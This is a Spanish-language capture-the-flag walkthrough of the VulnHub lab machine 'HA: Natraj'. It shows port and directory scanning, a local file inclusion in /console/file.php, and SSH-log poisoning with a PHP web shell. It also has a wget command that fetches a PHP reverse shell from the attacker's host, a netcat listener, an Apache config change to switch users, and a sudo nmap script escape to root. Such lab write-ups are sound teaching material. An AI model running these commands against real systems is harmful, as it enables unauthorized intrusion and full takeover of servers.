[VLN] Natraj

Hoy vamos a hackear la maquina de Vulnhub llamada Natraj. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/ha-natraj,489/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@m0nique:~$ nmap -A -p- 192.168.112.135 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-08 23:15 CEST Nmap scan report for 192.168.112.135 Host is up (0.00026s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d9:9f:da:f4:2e:67:01:92:d5:da:7f:70:d0:06:b3:92 (RSA) | 256 bc:ea:f1:3b:fa:7c:05:0c:92:95:92:e9:e7:d2:07:71 (ECDSA) |_ 256 f0:24:5b:7a:3b:d6:b7:94:c4:4b:fe:57:21:f8:00:61 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: HA:Natraj Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.39 seconds
    Exploramos un poco Apache.
    sml@m0nique:~$ gobuster dir -u http://192.168.112.135 -w /usr/share/wordlists/dirb/big.txt -x txt,php,html,htm =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.112.135 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: txt,php,html,htm [+] Timeout: 10s =============================================================== 2020/06/08 23:16:22 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htaccess.htm (Status: 403) /.htaccess.txt (Status: 403) /.htaccess.php (Status: 403) /.htaccess.html (Status: 403) /.htpasswd (Status: 403) /.htpasswd.txt (Status: 403) /.htpasswd.php (Status: 403) /.htpasswd.html (Status: 403) /.htpasswd.htm (Status: 403) /console (Status: 301) /images (Status: 301) /index.html (Status: 200) /server-status (Status: 403) =============================================================== 2020/06/08 23:16:34 Finished ===============================================================
    Vemos que hay un directorio llamado /console. Si entramos en el vemos un fichero llamado file.php. Tras probar de pasarle varios parametros a file.php vemos que el parametro que funciona es ?file y si le pasamos un fichero, vemos que es vulnerable a LFI... Asi pues, si visitamos: http://192.168.112.135/console/file.php?file=/etc/passwd Podemos ver:
    ---SNIP--- natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash ---SNIP----
    Miramos que mas podemos leer y que pueda resultarnos util, vemos que podemos leer el fichero /var/log/auth.log: http://192.168.112.135/console/file.php?file=/var/log/auth.log
    ---SNIP--- Jun 3 09:41:14 ubuntu systemd-logind[434]: New seat seat0. Jun 3 09:41:14 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event0 (Power Button) Jun 3 09:41:15 ubuntu sshd[457]: Server listening on 0.0.0.0 port 22. Jun 3 09:41:15 ubuntu sshd[457]: Server listening on :: port 22. Jun 3 09:41:15 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard) Jun 3 09:41:47 ubuntu sshd[612]: Accepted password for natraj from 192.168.1.103 port 49859 ssh2 Jun 3 09:41:47 ubuntu sshd[612]: pam_unix(sshd:session): session opened for user natraj by (uid=0) Jun 3 09:41:47 ubuntu systemd-logind[434]: New session 1 of user natraj. Jun 3 09:41:47 ubuntu systemd: pam_unix(systemd-user:session): session opened for user natraj by (uid=0) Jun 3 09:41:59 ubuntu sudo: natraj : TTY=pts/ ---SNIP---
  • Exploitation
  • Sabiendo esto, vamos a conectarnos por SSH para inyectar codigo, y que luego podamos usarlo a traves de auth.log para ejecutar comandos :)
    sml@m0nique:~$ ssh '<?php system($_GET['cmd']); ?>'@192.168.112.135 The authenticity of host '192.168.112.135 (192.168.112.135)' can't be established. ECDSA key fingerprint is SHA256:LvUVmGWIYBfaqxlxouyJwlU19DzRO0Y9dMcBclxz1zU. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.112.135' (ECDSA) to the list of known hosts. @192.168.112.135's password: Permission denied, please try again.
    Una vez hemos intentado loguearnos como el usuario '<?php system($_GET['cmd']); ?>' a traves de ssh, preparamos nuestra reverse shell.
    sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php . sml@m0nique:~$ nano php-reverse-shell.php # Modificamos nuestra IP/Puerto. sml@m0nique:~$ mv php-reverse-shell.php shelly.php sml@m0nique:~$ sudo mv shelly.php /var/www/html
    Descargamos la reverse shell en la VM victima accediendo a:
    http://192.168.112.135/console/file.php?file=/var/log/auth.log&cmd=wget%20http:/ /192.168.112.128/shelly.php%20-O%20/var/www/html/yo.php
    Ponemos a la escucha nc.
    sml@m0nique:~$ nc -nlvp 5555
    Y nos conectamos a http://192.168.112.135/yo.php para obtener nuestra shell!
  • Low Shell
  • sml@m0nique:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.112.128] from (UNKNOWN) [192.168.112.135] 53298 Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 16:33:36 up 19 min, 0 users, load average: 0.01, 0.01, 0.02 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@ubuntu:/$
    "Mejoramos" nuestra shell.
    www-data@ubuntu:/$ ^Z [1]+ Detenido nc -nlvp 6666 sml@m0nique:~$ stty raw -echo sml@m0nique:~$ fg www-data@ubuntu:/$ export TERM=linux
    Ya estamos dentro! Vamos a explorar un poco con el script linpeas.sh[1].
    www-data@ubuntu:/$ cd /tmp www-data@ubuntu:/tmp$ wget http://192.168.112.128/linpeas.sh www-data@ubuntu:/tmp$ sh linpeas.sh ----SNIP---- [+] Interesting writable files owned by me or writable by everyone (not in Home) [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files /dev/mqueue /dev/mqueue/linpeas.txt /dev/shm /etc/apache2/apache2.conf /run/lock /run/lock/apache2 ----SNIP----
    Vemos que podemos modificar el fichero /etc/apache2/apache2.conf. Lo editamos
    www-data@ubuntu:/tmp$ nano /etc/apache2/apache2.conf
    Cambiamos lo siguiente:
    # These need to be set in /etc/apache2/envvars User ${APACHE_RUN_USER} Group ${APACHE_RUN_GROUP}
    Por lo siguiente:
    # These need to be set in /etc/apache2/envvars User mahakal Group mahakal
    De ese modo, al reiniciar, Apache se ejecutara con los permisos del usuario del sistema que hemos visto en /etc/passwd (mahakal), y al obtener la reverse shell de nuevo, lo haremos con sus privilegios. REINICIAMOS LA VM y una vez reiniciada, volvemos a poner nc a la escucha:
    sml@m0nique:~$ nc -nlvp 5555 listening on [any] 5555 ...
    Accedemos a: http://192.168.112.135/yo.php Y vemos que ya tenemos los privilegios del usuario mahakal:
    $ id uid=1001(mahakal) gid=1001(mahakal) groups=1001(mahakal)
  • Privilege Escalation
  • $ python3 -c 'import pty; pty.spawn("/bin/bash")' mahakal@ubuntu:/$ sudo -l sudo -l Matching Defaults entries for mahakal on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User mahakal may run the following commands on ubuntu: (root) NOPASSWD: /usr/bin/nmap mahakal@ubuntu:/$ echo 'os.execute("/bin/bash")' > /tmp/yeah.txt mahakal@ubuntu:/$ sudo nmap --script=/tmp/yeah.txt sudo nmap --script=/tmp/yeah.txt Starting Nmap 7.60 ( https://nmap.org ) at 2020-06-11 04:22 PDT NSE: Warning: Loading '/tmp/yeah.txt' -- the recommended file extension is '.nse'. root@ubuntu:/# id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • root@ubuntu:/# cd /root root@ubuntu:~# ls root.txt root@ubuntu:~# cat root.txt ███▄▄▄▄ ▄████████ ███ ▄████████ ▄████████ ▄█ ███▀▀▀██▄ ███ ███ ▀█████████▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀███▀▀██ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀ ▄███▄▄▄▄██▀ ███ ███ ███ ███ ███ ▀███████████ ███ ▀▀███▀▀▀▀▀ ▀███████████ ███ ███ ███ ███ ███ ███ ▀███████████ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀█ █▀ ███ █▀ ▄████▀ ███ ███ ███ █▀ █▄ ▄███ ███ ███ ▀▀▀▀▀▀ !! Congrats you have finished this task !! Contact us here: Hacking Articles : https://twitter.com/rajchandel/ Geet Madan : https://www.linkedin.com/in/geet-madan/ +-+-+-+-+-+ +-+-+-+-+-+-+-+ |E|n|j|o|y| |H|A|C|K|I|N|G| +-+-+-+-+-+ +-+-+-+-+-+-+-+ __________________________________
  • End
  • Y con esto ya seriamos root de la maquina :) [1]https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS